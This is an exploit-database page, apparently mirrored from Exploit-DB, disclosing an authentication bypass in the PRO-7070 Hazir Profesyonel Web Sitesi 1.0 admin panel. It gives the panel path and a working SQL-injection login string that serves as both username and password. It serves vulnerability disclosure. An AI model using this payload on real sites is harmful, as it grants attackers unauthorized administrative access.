header-logo
Suggest Exploit
vendor:
PRO-7070 Hazir Profesyonel Web Sitesi
by:
Ahmet Ümit BAYRAM
5.5
CVSS
MEDIUM
Authentication Bypass
CWE
Product Name: PRO-7070 Hazir Profesyonel Web Sitesi
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2019

PRO-7070 Hazir Profesyonel Web Sitesi 1.0 – Authentication Bypass

This exploit allows an attacker to bypass authentication in the administration panel of PRO-7070 Hazir Profesyonel Web Sitesi 1.0. By using the username '=' 'or' and password '=' 'or', the attacker can gain unauthorized access to the panel.

Mitigation:

The vendor has not provided any specific mitigation steps. It is recommended to apply necessary security patches or updates to prevent this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass
# Date: 2019-12-08
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.websitem.biz/hazir-site/pro-7070-hazir-mobil-tablet-uyumlu-web-sitesi
# Tested on: Kali Linux
# Version: 1.0
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/pass.asp
Username: '=' 'or'
Password: '=' 'or'

Navigation

Suggest Exploit

Services By CQR